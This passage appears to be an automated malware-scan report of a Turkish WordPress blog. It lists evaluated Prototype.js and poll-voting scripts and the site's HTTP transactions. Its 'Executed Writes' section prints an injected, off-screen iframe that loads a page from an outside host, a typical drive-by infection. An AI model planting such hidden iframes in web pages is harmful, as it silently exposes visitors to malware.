    },
    inputSelector: function(a) {
        if (a.checked) return [a.name, a.value]
    },
    textarea: function(a) {
        return [a.name, a.value]
    },
    select: function(a) {
        return Form.Element.Serializers[a.type == 'select-one' ? 'selectOne' : 'selectMany'](a)
    },
    selectOne: function(a) {
        var b = '',
            opt, index = a.selectedIndex;
        if (index >= 0) {
            opt = a.options[index];
            b = opt.value;
            if (!b && !('value' in opt)) b = opt.text
        }
        return [a.name, b]
    },
    selectMany: function(a) {
        var b = new Array();
        for (var i = 0; i < a.length; i++) {
            var c = a.options[i];
            if (c.selected) {
                var d = c.value;
                if (!d && !('value' in c)) d = c.text;
                b.push(d)
            }
        }
        return [a.name, b]
    }
};
var $F = Form.Element.getValue;
Abstract.TimedObserver = function() {};
Abstract.TimedObserver.prototype = {
    initialize: function(a, b, c) {
        this.frequency = b;
        this.element = $(a);
        this.callback = c;
        this.lastValue = this.getValue();
        this.registerCallback()
    },
    registerCallback: function() {
        setInterval(this.onTimerEvent.bind(this), this.frequency * 1000)
    },
    onTimerEvent: function() {
        var a = this.getValue();
        if (this.lastValue != a) {
            this.callback(this.element, a);
            this.lastValue = a
        }
    }
};
Form.Element.Observer = Class.create();
Form.Element.Observer.prototype = Object.extend(new Abstract.TimedObserver(), {
    getValue: function() {
        return Form.Element.getValue(this.element)
    }
});
Form.Observer = Class.create();
Form.Observer.prototype = Object.extend(new Abstract.TimedObserver(), {
    getValue: function() {
        return Form.serialize(this.element)
    }
});
Abstract.EventObserver = function() {};
Abstract.EventObserver.prototype = {
    initialize: function(a, b) {
        this.element = $(a);
        this.callback = b;
        this.lastValue = this.getValue();
        if (this.element.tagName.toLowerCase() == 'form') this.registerFormCallbacks();
        else this.registerCallback(this.element)
    },
    onElementEvent: function() {
        var a = this.getValue();
        if (this.lastValue != a) {
            this.callback(this.element, a);
            this.lastValue = a
        }
    },
    registerFormCallbacks: function() {
        var a = Form.getElements(this.element);
        for (var i = 0; i < a.length; i++) this.registerCallback(a[i])
    },
    registerCallback: function(a) {
        if (a.type) {
            switch (a.type.toLowerCase()) {
            case 'checkbox':
            case 'radio':
                Event.observe(a, 'click', this.onElementEvent.bind(this));
                break;
            case 'password':
            case 'text':
            case 'textarea':
            case 'select-one':
            case 'select-multiple':
                Event.observe(a, 'change', this.onElementEvent.bind(this));
                break
            }
        }
    }
};
Form.Element.EventObserver = Class.create();
Form.Element.EventObserver.prototype = Object.extend(new Abstract.EventObserver(), {
    getValue: function() {
        return Form.Element.getValue(this.element)
    }
});
Form.EventObserver = Class.create();
Form.EventObserver.prototype = Object.extend(new Abstract.EventObserver(), {
    getValue: function() {
        return Form.serialize(this.element)
    }
});
if (!window.Event) {
    var Event = new Object()
}
Object.extend(Event, {
    KEY_BACKSPACE: 8,
    KEY_TAB: 9,
    KEY_RETURN: 13,
    KEY_ESC: 27,
    KEY_LEFT: 37,
    KEY_UP: 38,
    KEY_RIGHT: 39,
    KEY_DOWN: 40,
    KEY_DELETE: 46,
    element: function(a) {
        return a.target || a.srcElement
    },
    isLeftClick: function(a) {
        return (((a.which) && (a.which == 1)) || ((a.button) && (a.button == 1)))
    },
    pointerX: function(a) {
        return a.pageX || (a.clientX + (document.documentElement.scrollLeft || document.body.scrollLeft))
    },
    pointerY: function(a) {
        return a.pageY || (a.clientY + (document.documentElement.scrollTop || document.body.scrollTop))
    },
    stop: function(a) {
        if (a.preventDefault) {
            a.preventDefault();
            a.stopPropagation()
        } else {
            a.returnValue = false;
            a.cancelBubble = true
        }
    },
    findElement: function(a, b) {
        var c = Event.element(a);
        while (c.parentNode && (!c.tagName || (c.tagName.toUpperCase() != b.toUpperCase()))) c = c.parentNode;
        return c
    },
    observers: false,
    _observeAndCache: function(a, b, c, d) {
        if (!this.observers) this.observers = [];
        if (a.addEventListener) {
            this.observers.push([a, b, c, d]);
            a.addEventListener(b, c, d)
        } else if (a.attachEvent) {
            this.observers.push([a, b, c, d]);
            a.attachEvent('on' + b, c)
        }
    },
    unloadCache: function() {
        if (!Event.observers) return;
        for (var i = 0; i < Event.observers.length; i++) {
            Event.stopObserving.apply(this, Event.observers[i]);
            Event.observers[i][0] = null
        }
        Event.observers = false
    },
    observe: function(a, b, c, d) {
        var a = $(a);
        d = d || false;
        if (b == 'keypress' && (navigator.appVersion.match(/Konqueror|Safari|KHTML/) || a.attachEvent)) b = 'keydown';
        this._observeAndCache(a, b, c, d)
    },
    stopObserving: function(a, b, c, d) {
        var a = $(a);
        d = d || false;
        if (b == 'keypress' && (navigator.appVersion.match(/Konqueror|Safari|KHTML/) || a.detachEvent)) b = 'keydown';
        if (a.removeEventListener) {
            a.removeEventListener(b, c, d)
        } else if (a.detachEvent) {
            a.detachEvent('on' + b, c)
        }
    }
});
Event.observe(window, 'unload', Event.unloadCache, false);
var Position = {
    includeScrollOffsets: false,
    prepare: function() {
        this.deltaX = window.pageXOffset || document.documentElement.scrollLeft || document.body.scrollLeft || 0;
        this.deltaY = window.pageYOffset || document.documentElement.scrollTop || document.body.scrollTop || 0
    },
    realOffset: function(a) {
        var b = 0,
            valueL = 0;
        do {
            b += a.scrollTop || 0;
            valueL += a.scrollLeft || 0;
            a = a.parentNode
        } while (a);
        return [valueL, b]
    },
    cumulativeOffset: function(a) {
        var b = 0,
            valueL = 0;
        do {
            b += a.offsetTop || 0;
            valueL += a.offsetLeft || 0;
            a = a.offsetParent
        } while (a);
        return [valueL, b]
    },
    positionedOffset: function(a) {
        var b = 0,
            valueL = 0;
        do {
            b += a.offsetTop || 0;
            valueL += a.offsetLeft || 0;
            a = a.offsetParent;
            if (a) {
                p = Element.getStyle(a, 'position');
                if (p == 'relative' || p == 'absolute') break
            }
        } while (a);
        return [valueL, b]
    },
    offsetParent: function(a) {
        if (a.offsetParent) return a.offsetParent;
        if (a == document.body) return a;
        while ((a = a.parentNode) && a != document.body) if (Element.getStyle(a, 'position') != 'static') return a;
        return document.body
    },
    within: function(a, b, c) {
        if (this.includeScrollOffsets) return this.withinIncludingScrolloffsets(a, b, c);
        this.xcomp = b;
        this.ycomp = c;
        this.offset = this.cumulativeOffset(a);
        return (c >= this.offset[1] && c < this.offset[1] + a.offsetHeight && b >= this.offset[0] && b < this.offset[0] + a.offsetWidth)
    },
    withinIncludingScrolloffsets: function(a, b, c) {
        var d = this.realOffset(a);
        this.xcomp = b + d[0] - this.deltaX;
        this.ycomp = c + d[1] - this.deltaY;
        this.offset = this.cumulativeOffset(a);
        return (this.ycomp >= this.offset[1] && this.ycomp < this.offset[1] + a.offsetHeight && this.xcomp >= this.offset[0] && this.xcomp < this.offset[0] + a.offsetWidth)
    },
    overlap: function(a, b) {
        if (!a) return 0;
        if (a == 'vertical') return ((this.offset[1] + b.offsetHeight) - this.ycomp) / b.offsetHeight;
        if (a == 'horizontal') return ((this.offset[0] + b.offsetWidth) - this.xcomp) / b.offsetWidth
    },
    clone: function(a, b) {
        a = $(a);
        b = $(b);
        b.style.position = 'absolute';
        var c = this.cumulativeOffset(a);
        b.style.top = c[1] + 'px';
        b.style.left = c[0] + 'px';
        b.style.width = a.offsetWidth + 'px';
        b.style.height = a.offsetHeight + 'px'
    },
    page: function(a) {
        var b = 0,
            valueL = 0;
        var c = a;
        do {
            b += c.offsetTop || 0;
            valueL += c.offsetLeft || 0;
            if (c.offsetParent == document.body) if (Element.getStyle(c, 'position') == 'absolute') break
        } while (c = c.offsetParent);
        c = a;
        do {
            b -= c.scrollTop || 0;
            valueL -= c.scrollLeft || 0
        } while (c = c.parentNode);
        return [valueL, b]
    },
    clone: function(a, b) {
        var c = Object.extend({
            setLeft: true,
            setTop: true,
            setWidth: true,
            setHeight: true,
            offsetTop: 0,
            offsetLeft: 0
        }, arguments[2] || {});
        a = $(a);
        var p = Position.page(a);
        b = $(b);
        var d = [0, 0];
        var e = null;
        if (Element.getStyle(b, 'position') == 'absolute') {
            e = Position.offsetParent(b);
            d = Position.page(e)
        }
        if (e == document.body) {
            d[0] -= document.body.offsetLeft;
            d[1] -= document.body.offsetTop
        }
        if (c.setLeft) b.style.left = (p[0] - d[0] + c.offsetLeft) + 'px';
        if (c.setTop) b.style.top = (p[1] - d[1] + c.offsetTop) + 'px';
        if (c.setWidth) b.style.width = a.offsetWidth + 'px';
        if (c.setHeight) b.style.height = a.offsetHeight + 'px'
    },
    absolutize: function(a) {
        a = $(a);
        if (a.style.position == 'absolute') return;
        Position.prepare();
        var b = Position.positionedOffset(a);
        var c = b[1];
        var d = b[0];
        var e = a.clientWidth;
        var f = a.clientHeight;
        a._originalLeft = d - parseFloat(a.style.left || 0);
        a._originalTop = c - parseFloat(a.style.top || 0);
        a._originalWidth = a.style.width;
        a._originalHeight = a.style.height;
        a.style.position = 'absolute';
        a.style.top = c + 'px';
        a.style.left = d + 'px';
        a.style.width = e + 'px';
        a.style.height = f + 'px'
    },
    relativize: function(a) {
        a = $(a);
        if (a.style.position == 'relative') return;
        Position.prepare();
        a.style.position = 'relative';
        var b = parseFloat(a.style.top || 0) - (a._originalTop || 0);
        var c = parseFloat(a.style.left || 0) - (a._originalLeft || 0);
        a.style.top = b + 'px';
        a.style.left = c + 'px';
        a.style.height = a._originalHeight;
        a.style.width = a._originalWidth
    }
};
if (/Konqueror|Safari|KHTML/.test(navigator.userAgent)) {
    Position.cumulativeOffset = function(a) {
        var b = 0,
            valueL = 0;
        do {
            b += a.offsetTop || 0;
            valueL += a.offsetLeft || 0;
            if (a.offsetParent == document.body) if (Element.getStyle(a, 'position') == 'absolute') break;
            a = a.offsetParent
        } while (a);
        return [valueL, b]
    }
}

#4 JavaScript::Eval (size: 5038, repeated: 1)

var polls = new sack(polls_ajax_url);
var poll_id = 0;
var poll_answer_id = "";
var poll_fadein_opacity = 0;
var poll_fadeout_opacity = 100;
var is_ie = (document.all && document.getElementById);
var is_moz = (!document.all && document.getElementById);
var is_opera = (navigator.userAgent.indexOf("Opera") > -1);
var is_being_voted = false;

function poll_vote(a) {
    if (!is_being_voted) {
        is_being_voted = true;
        poll_id = a;
        poll_form = document.getElementById('polls_form_' + poll_id);
        poll_answer = eval("poll_form.poll_" + poll_id);
        poll_answer_id = "";
        if (document.getElementById('poll_multiple_ans_' + poll_id)) {
            poll_multiple_ans = parseInt(document.getElementById('poll_multiple_ans_' + poll_id).value)
        } else {
            poll_multiple_ans = 0
        }
        poll_multiple_ans_count = 0;
        if (poll_answer.length != null) {
            for (i = 0; i < poll_answer.length; i++) {
                if (poll_answer[i].checked) {
                    if (poll_multiple_ans > 0) {
                        poll_answer_id = poll_answer[i].value + "," + poll_answer_id;
                        poll_multiple_ans_count++
                    } else {
                        poll_answer_id = parseInt(poll_answer[i].value)
                    }
                }
            }
        } else {
            poll_answer_id = poll_answer.value
        }
        if (poll_multiple_ans > 0) {
            if (poll_multiple_ans_count > 0 && poll_multiple_ans_count <= poll_multiple_ans) {
                poll_answer_id = poll_answer_id.substring(0, (poll_answer_id.length - 1));
                poll_loading_text();
                poll_process()
            } else if (poll_multiple_ans_count == 0) {
                is_being_voted = false;
                alert(polls_text_valid)
            } else {
                is_being_voted = false;
                alert(polls_text_multiple + " " + poll_multiple_ans + ".")
            }
        } else {
            if (poll_answer_id > 0) {
                poll_loading_text();
                poll_process()
            } else {
                is_being_voted = false;
                alert(polls_text_valid)
            }
        }
    } else {
        alert(polls_text_wait)
    }
}
function poll_result(a) {
    if (!is_being_voted) {
        is_being_voted = true;
        poll_id = a;
        poll_loading_text();
        poll_process_result()
    } else {
        alert(polls_text_wait)
    }
}
function poll_booth(a) {
    if (!is_being_voted) {
        is_being_voted = true;
        poll_id = a;
        poll_loading_text();
        poll_process_booth()
    } else {
        alert(polls_text_wait)
    }
}
function poll_fadein_text() {
    if (poll_fadein_opacity == 90) {
        poll_unloading_text()
    }
    if (poll_fadein_opacity < 100) {
        poll_fadein_opacity += 10;
        if (is_opera) {
            poll_fadein_opacity = 100;
            poll_unloading_text()
        } else if (is_ie) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.filter = 'alpha(opacity=' + poll_fadein_opacity + ')'
            } else {
                poll_fadein_opacity = 100;
                poll_unloading_text()
            }
        } else if (is_moz) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.MozOpacity = (poll_fadein_opacity / 100)
            } else {
                poll_fadein_opacity = 100;
                poll_unloading_text()
            }
        }
        setTimeout("poll_fadein_text()", 100)
    } else {
        poll_fadein_opacity = 100;
        is_being_voted = false
    }
}
function poll_loading_text() {
    if (poll_show_loading) {
        document.getElementById('polls-' + poll_id + '-loading').style.display = 'block'
    }
}
function poll_unloading_text() {
    if (poll_show_loading) {
        document.getElementById('polls-' + poll_id + '-loading').style.display = 'none'
    }
}
function poll_process() {
    if (poll_fadeout_opacity > 0) {
        poll_fadeout_opacity -= 10;
        if (is_opera) {
            poll_fadeout_opacity = 0
        } else if (is_ie) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.filter = 'alpha(opacity=' + poll_fadeout_opacity + ')'
            } else {
                poll_fadeout_opacity = 0
            }
        } else if (is_moz) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.MozOpacity = (poll_fadeout_opacity / 100)
            } else {
                poll_fadeout_opacity = 0
            }
        }
        setTimeout("poll_process()", 100)
    } else {
        poll_fadeout_opacity = 0;
        polls.reset();
        polls.setVar("vote", true);
        polls.setVar("poll_id", poll_id);
        polls.setVar("poll_" + poll_id, poll_answer_id);
        polls.method = 'POST';
        polls.element = 'polls-' + poll_id + '-ans';
        polls.onCompletion = poll_fadein_text;
        polls.runAJAX();
        poll_fadein_opacity = 0;
        poll_fadeout_opacity = 100
    }
}
function poll_process_result() {
    if (poll_fadeout_opacity > 0) {
        poll_fadeout_opacity -= 10;
        if (is_opera) {
            poll_fadeout_opacity = 0
        } else if (is_ie) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.filter = 'alpha(opacity=' + poll_fadeout_opacity + ')'
            } else {
                poll_fadeout_opacity = 0
            }
        } else if (is_moz) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.MozOpacity = (poll_fadeout_opacity / 100)
            } else {
                poll_fadeout_opacity = 0
            }
        }
        setTimeout("poll_process_result()", 100)
    } else {
        poll_fadeout_opacity = 0;
        polls.reset();
        polls.setVar("pollresult", poll_id);
        polls.method = 'GET';
        polls.element = 'polls-' + poll_id + '-ans';
        polls.onCompletion = poll_fadein_text;
        polls.runAJAX();
        poll_fadein_opacity = 0;
        poll_fadeout_opacity = 100
    }
}
function poll_process_booth() {
    if (poll_fadeout_opacity > 0) {
        poll_fadeout_opacity -= 10;
        if (is_opera) {
            poll_fadeout_opacity = 0
        } else if (is_ie) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.filter = 'alpha(opacity=' + poll_fadeout_opacity + ')'
            } else {
                poll_fadeout_opacity = 0
            }
        } else if (is_moz) {
            if (poll_show_fading) {
                document.getElementById('polls-' + poll_id + '-ans').style.MozOpacity = (poll_fadeout_opacity / 100)
            } else {
                poll_fadeout_opacity = 0
            }
        }
        setTimeout("poll_process_booth()", 100)
    } else {
        poll_fadeout_opacity = 0;
        polls.reset();
        polls.setVar("pollbooth", poll_id);
        polls.method = 'GET';
        polls.element = 'polls-' + poll_id + '-ans';
        polls.onCompletion = poll_fadein_text;
        polls.runAJAX();
        poll_fadein_opacity = 0;
        poll_fadeout_opacity = 100
    }
}
function poll_disable_voting(a) {
    poll_form = document.getElementById('polls_form_' + a);
    for (i = 0; i < poll_form.length; i++) {
        poll_form[i].disabled = true
    }
}

Executed Writes (1)

#1 JavaScript::Write (size: 202, repeated: 1)

<iframe src="http://appearingderevkira.br.ms:81/rem2.html" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" style="width:29px;position:absolute;left:-2106px;"></iframe>


HTTP Transactions (97)


Request Response
GET /dizi-guzelleri-televizyonun-guzel-yuzleri.html HTTP/1.1

Host: osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 301 Moved Permanently

Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:26 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.osmanoguz.net/xmlrpc.php
Set-Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D; path=/
Location: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Content-Length: 20
GET /wp-content/themes/osman/js/colorbox/colorbox.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;1225-4f19b75e-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:06 GMT
Content-Length: 1489
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /dizi-guzelleri-televizyonun-guzel-yuzleri.html HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Transfer-Encoding: chunked
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.osmanoguz.net/xmlrpc.php
Set-Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D; path=/
Link: &lt;http://www.osmanoguz.net/?p=1547&gt;; rel=shortlink
GET /wp-content/themes/osman/style.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;7358-4f1d97e9-0&quot;
Last-Modified: Mon, 23 Jan 2012 17:24:57 GMT
Content-Length: 7915
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/plugins/contact-form-7/stylesheet.css?ver=2.0.6 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;332-4aec242d-0&quot;
Last-Modified: Sat, 31 Oct 2009 11:49:01 GMT
Content-Length: 391
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/themes/osman/js/jquery.nivo.slider.pack.js?ver=3.3.1 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;3dc3-4f19b75c-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:04 GMT
Content-Length: 3904
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/themes/osman/js/jcarousellite_1.0.1.pack.js?ver=3.3.1 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;859-4f19b75c-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:04 GMT
Content-Length: 1307
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-includes/js/comment-reply.js?ver=20090102 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;312-4f19b48d-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:38:05 GMT
Content-Length: 418
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/themes/osman/js/colorbox/jquery.colorbox-min.js?ver=3.3.1 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;2659-4f19b75e-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:06 GMT
Content-Length: 4551
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/themes/osman/js/scripts.js?ver=3.3.1 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;ceb-4f19b75d-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:50:05 GMT
Content-Length: 1169
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-includes/js/jquery/jquery.js?ver=1.7.1 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;16ec1-4f19b4c1-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:38:57 GMT
Content-Length: 38383
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/themes/osman/css/reset.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;312-4f19b6bd-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:47:25 GMT
Content-Length: 465
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/themes/osman/css/nivo-slider.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;75b-4f19b6bd-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:47:25 GMT
Content-Length: 853
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
